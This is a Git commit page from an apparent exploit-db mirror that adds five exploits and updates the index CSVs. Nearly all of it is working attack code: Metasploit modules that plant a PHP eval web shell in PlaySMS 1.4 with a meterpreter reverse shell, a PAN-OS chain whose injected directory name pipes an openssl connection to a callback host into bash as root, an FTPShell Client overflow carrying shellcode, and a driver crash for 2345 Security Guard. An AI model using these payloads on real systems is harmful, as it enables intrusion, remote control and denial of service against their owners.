bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-09

Browse source 
5 changes to exploits/shellcodes

2345 Security Guard 3.7 - Denial of Service
FTPShell Client 6.7 - Buffer Overflow
Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)
PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)
PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)

Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)
This commit is contained in:
Offensive Security 2018-05-09 05:01:46 +00:00
parent a066ef9212
commit 635ec84504
7 changed files with 824 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

193
exploits/php/remote/44598.rb Executable file
View file

@ -0,0 +1,193 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution',
'Description' => %q{
This module exploits an authenticated file upload remote code excution vulnerability
in PlaySMS Version 1.4. This issue is caused by improper file contents handling in
import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV
file containing a malicious payload via vectors involving the User-Agent HTTP header
and PHP code in the User-Agent.
This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>' # Discoverys and Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE','2017-9101'],
['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'],
['EDB','42044']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PlaySMS 1.4', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 21 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Login ......')
# Send Creds with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Try to access index page with authenticated cookie.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
})
# if we redirect to core_welcome dan we assume we have authenticated cookie.
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
end
end
# Tested successfully on Dina: 1.0.1 machine on vulnhub.
# Link : https://www.vulnhub.com/entry/dina-101,200/
def exploit
cookies = login
# Agian CSRF token.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_phonebook',
'route' => 'import',
'op' => 'list',
}.to_a.shuffle]
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for upload : #{csrf}")
# Payload.
evil = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
#making csv file body
final_csv = "Name,Email,Department\n"
final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}"
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"') #payload
data = post_data.to_s
vprint_status('Trying to upload malicious CSV file ....')
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'POST',
'agent' => payload.encode,
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_phonebook',
'route' => 'import',
'op' => 'import',
}.to_a.shuffle],
'headers' => {
'Upgrade-Insecure-Requests' => '1',
},
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
end
end

189
exploits/php/remote/44599.rb Executable file
View file

@ -0,0 +1,189 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution',
'Description' => %q{
This module exploits a code injection vulnerability within an authenticated file
upload feature in PlaySMS v1.4. This issue is caused by improper file name handling
in sendfromfile.php file.
Authenticated Users can upload a file and rename the file with a malicious payload.
This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Discoverys and Metasploit Module
'DarkS3curity' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB','42003'],
['CVE','2017-9080'],
['URL','https://www.youtube.com/watch?v=MuYoImvfpew'],
['URL','http://touhidshaikh.com/blog/?p=336']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PlaySMS 1.4', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 21 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
CheckCode::Safe
end
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Login ......')
# Send Creds with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Try to access index page with authenticated cookie.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# if we redirect to core_welcome dan we assume we have authenticated cookie.
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
end
end
def exploit
cookies = login
# Agian CSRF token.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_sendfromfile',
'op' => 'list',
}.to_a.shuffle]
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Grabbing CSRF token from body.
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for upload : #{csrf}")
# Payload.
evilname = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
data = post_data.to_s
vprint_status('Trying to upload file with malicious Filename Field....')
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'POST',
'agent' => payload.encode,
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'feature_sendfromfile',
'op' => 'upload_confirm',
}.to_a.shuffle],
'headers' => {
'Upgrade-Insecure-Requests' => '1',
},
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
end
end

198
exploits/unix/remote/44597.rb Executable file
View file

@ -0,0 +1,198 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption',
'Description' => %q{
This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the target appliance. The cron job used for the final
payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
},
'Author' => [
'Philip Pettersson <philip.pettersson[at]gmail com>', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
['CVE', '2017-15944'],
['URL', 'http://seclists.org/fulldisclosure/2017/Dec/38'],
['BID', '102079'],
],
'DisclosureDate' => 'Dec 11 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {'BadChars' => '', 'Space' => 8000, 'DisableNops' => true},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 2}
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
])
end
def exploit
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Set the base directory and the staging payload directory path name
base_directory = "/opt/pancfg/mgmt/logdb/traffic/1/"
command_payload = "* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; "
target_directory = base_directory + command_payload
if target_directory.length > 255
print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)")
return
end
dev_str_1 = Rex::Text.rand_text_alpha_lower(1+rand(10))
dev_str_2 = Rex::Text.rand_text_alpha_lower(1+rand(10))
user_id = rand(2000).to_s
print_status("Creating our corrupted session ID...")
# Obtain a session cookie linked to a corrupted session file. A raw request
# is needed to prevent encoding of the parameters injected into the session
res = send_request_raw(
'method' => 'GET',
'uri' => "/esp/cms_changeDeviceContext.esp?device=#{dev_str_1}:#{dev_str_2}%27\";user|s.\"#{user_id}\";"
)
unless res && res.body.to_s.index('@start@Success@end@')
print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}")
return
end
cookies = res.get_cookies
unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/
print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}")
return
end
create_directory_tid = 1 + rand(1000)
create_directory_json = JSON.dump({
"action" => "PanDirect",
"method" => "execute",
"data" => [
Rex::Text.md5(create_directory_tid.to_s),
"Administrator.get",
{
"changeMyPassword" => true,
"template" => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
"id" => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00"
}
],
"type" => "rpc",
"tid" => create_directory_tid
})
print_status("Calling Administrator.get to create directory under #{base_directory}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => '/php/utils/router.php/Administrator.get',
'cookie' => cookies,
'ctype' => "application/json",
'data' => create_directory_json
)
unless res && res.body.to_s.index('Async request enqueued')
print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}")
return
end
register_dirs_for_cleanup(base_directory)
print_status("Waiting up to 20 minutes for the cronjob to fire and execute...")
expiry = Time.at(Time.now.to_i + (60*20)).to_i
last_notice = 0
while expiry > Time.now.to_i && ! session_created?
if last_notice + 30 < Time.now.to_i
print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...")
last_notice = Time.now.to_i
end
sleep(1)
end
unless session_created?
print_error("No connection received from the target, giving up.")
end
end
def stage_real_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => true,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_real_payload(client)
}
# Start the listening service
self.service.start
end
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::SocketError
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end

58
exploits/windows/remote/44596.py Executable file
View file

@ -0,0 +1,58 @@
# -*- coding: utf-8 -*-
# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/download.htm
# Version: 6.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86.
# CVE : CVE-2018-7573
import socket
import sys
port = 21
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\x22\x0d\x0a'
buf = ""
buf += "\xdb\xc8\xba\x3e\x93\x15\x8f\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xc6\x3a\x71"
buf += "\xe0\x73\xaa\xf7\x0b\x8c\x2a\x98\x82\x69\x1b\x98\xf1"
buf += "\xfa\x0b\x28\x71\xae\xa7\xc3\xd7\x5b\x3c\xa1\xff\x6c"
buf += "\xf5\x0c\x26\x42\x06\x3c\x1a\xc5\x84\x3f\x4f\x25\xb5"
buf += "\x8f\x82\x24\xf2\xf2\x6f\x74\xab\x79\xdd\x69\xd8\x34"
buf += "\xde\x02\x92\xd9\x66\xf6\x62\xdb\x47\xa9\xf9\x82\x47"
buf += "\x4b\x2e\xbf\xc1\x53\x33\xfa\x98\xe8\x87\x70\x1b\x39"
buf += "\xd6\x79\xb0\x04\xd7\x8b\xc8\x41\xdf\x73\xbf\xbb\x1c"
buf += "\x09\xb8\x7f\x5f\xd5\x4d\x64\xc7\x9e\xf6\x40\xf6\x73"
buf += "\x60\x02\xf4\x38\xe6\x4c\x18\xbe\x2b\xe7\x24\x4b\xca"
buf += "\x28\xad\x0f\xe9\xec\xf6\xd4\x90\xb5\x52\xba\xad\xa6"
buf += "\x3d\x63\x08\xac\xd3\x70\x21\xef\xb9\x87\xb7\x95\x8f"
buf += "\x88\xc7\x95\xbf\xe0\xf6\x1e\x50\x76\x07\xf5\x15\x88"
buf += "\x4d\x54\x3f\x01\x08\x0c\x02\x4c\xab\xfa\x40\x69\x28"
buf += "\x0f\x38\x8e\x30\x7a\x3d\xca\xf6\x96\x4f\x43\x93\x98"
buf += "\xfc\x64\xb6\xfa\x63\xf7\x5a\xd3\x06\x7f\xf8\x2b"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[+] FTP server started on port: "+str(port)+"\r\n")
except:
print("[x] Failed to start the server on port: "+str(port)+"\r\n")
eip = "\xed\x2e\x45" # CALL ESI from FTPShell.exe : 0x00452eed
nops = "\x90"*40
junk = "F"*(400 - len(nops) - len(buf))
payload = nops + buf + junk + eip
while True:
conn, addr = s.accept()
conn.send('220 FTP Server\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+payload+'" is current directory\r\n')

180
exploits/windows_x86/dos/44600.c Normal file
View file

@ -0,0 +1,180 @@
# Exploit Title: 2345 Security Guard 3.7 - Denial of Service
# Date: 2018-05-08
# Exploit Author: anhkgg
# Vendor Homepage: http://safe.2345.cc/
# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe
# Version: v3.7
# Tested on: Windows 7 x86
# CVE : CVE-2018-10809
#
# BSOD caused of 2345NetFirewall.sys because of not validating input valuestest version 3.7 on windows 7 x86 platform
#
#
#include <windows.h>
#include <stdio.h>
struct NETFW_IOCTL_ADD_PID
{
DWORD pid;
char seed[0x14];//
};//0x18
struct NETFW_IOCTL_SET_PID
{
BYTE set_state;//
BYTE unk;//1
WORD buf_len;//2
DWORD pid;//4
char buf[0x64];//8
};//6c
struct NETFW_IOCTL_222040
{
DWORD* ptr;
DWORD size;
};//
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
int result;
*a1 ^= *a2;
*a2 ^= *a1;
result = (unsigned __int8)*a2;
*a1 ^= result;
return result;
}
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
int result;
unsigned __int8 v4;
__int16 i;
__int16 j;
unsigned __int8 k;
for ( i = 0; i < 256; ++i )
a3[i] = i;
a3[256] = 0;
a3[257] = 0;
k = 0;
v4 = 0;
result = 0;
for ( j = 0; j < 256; ++j )
{
v4 += a3[j] + a1[k];
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
result = (k + 1) / len;
k = (k + 1) % len;
}
return result;
}
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
char *result;
__int16 i;
unsigned __int8 v5;
unsigned __int8 v6;
v5 = a3[256];
v6 = a3[257];
for ( i = 0; i < len; ++i )
{
v6 += a3[++v5];
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
}
a3[256] = v5;
result = a3;
a3[257] = v6;
return result;
}
void calc_seed(char* seed, char* dst)
{
char Source1[26] = {0};
char a3[300] = {0};
Source1[0] = 8;
Source1[1] = 14;
Source1[2] = 8;
Source1[3] = 10;
Source1[4] = 2;
Source1[5] = 3;
Source1[6] = 29;
Source1[7] = 23;
Source1[8] = 13;
Source1[9] = 3;
Source1[10] = 15;
Source1[11] = 22;
Source1[12] = 15;
Source1[13] = 7;
Source1[14] = 91;
Source1[15] = 4;
Source1[16] = 18;
Source1[17] = 26;
Source1[18] = 26;
Source1[19] = 3;
Source1[20] = 4;
Source1[21] = 1;
Source1[22] = 15;
Source1[23] = 25;
Source1[24] = 10;
Source1[25] = 13;
sub_12A80(seed, 0x14, a3);
sub_12B60(Source1, 0x1A, a3);
memcpy(dst, Source1, 26);
}
int poc_2345NetFirewall()
{
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(h == INVALID_HANDLE_VALUE) {
printf("[-] Open device error: %d\n", GetLastError());
return 1;
}
DWORD BytesReturned = 0;
DWORD ctlcode = 0x222298;
NETFW_IOCTL_ADD_PID add_pid = {0};
add_pid.pid = GetCurrentProcessId();
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
ctlcode = 0x2222A4;
NETFW_IOCTL_SET_PID set_pid = {0};
set_pid.pid = GetCurrentProcessId();
set_pid.set_state = 1;
calc_seed(add_pid.seed, set_pid.buf);
set_pid.buf_len = 26;
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
//BSOD
ctlcode = 0x222040;
NETFW_IOCTL_222040 buf_222040 = {0};
buf_222040.size = 1;
buf_222040.ptr = (DWORD*)0x80000000;
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
return 0;
}
int main()
{
poc_2345NetFirewall();
return 0;
}

5
files_exploits.csv
View file

@ -5966,6 +5966,7 @@ id,file,description,date,author,type,platform,port
44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16472,6 +16473,10 @@ id,file,description,date,author,type,platform,port
44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows,
44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
44598,exploits/php/remote/44598.rb,"PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -880,4 +880,4 @@ id,file,description,date,author,type,platform
44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86

1 id file description date author type platform
880 44509 shellcodes/linux_x86/44509.c Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes) 2018-04-24 absolomb shellcode linux_x86
881 44510 shellcodes/linux_x86/44510.c Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes) 2018-04-24 absolomb shellcode linux_x86
882 44517 shellcodes/linux_x86/44517.c Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes) 2018-04-24 Nuno Freitas shellcode linux_x86
883 44594 shellcodes/linux_x86/44594.c Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes) 2018-05-06 Nuno Freitas shellcode linux_x86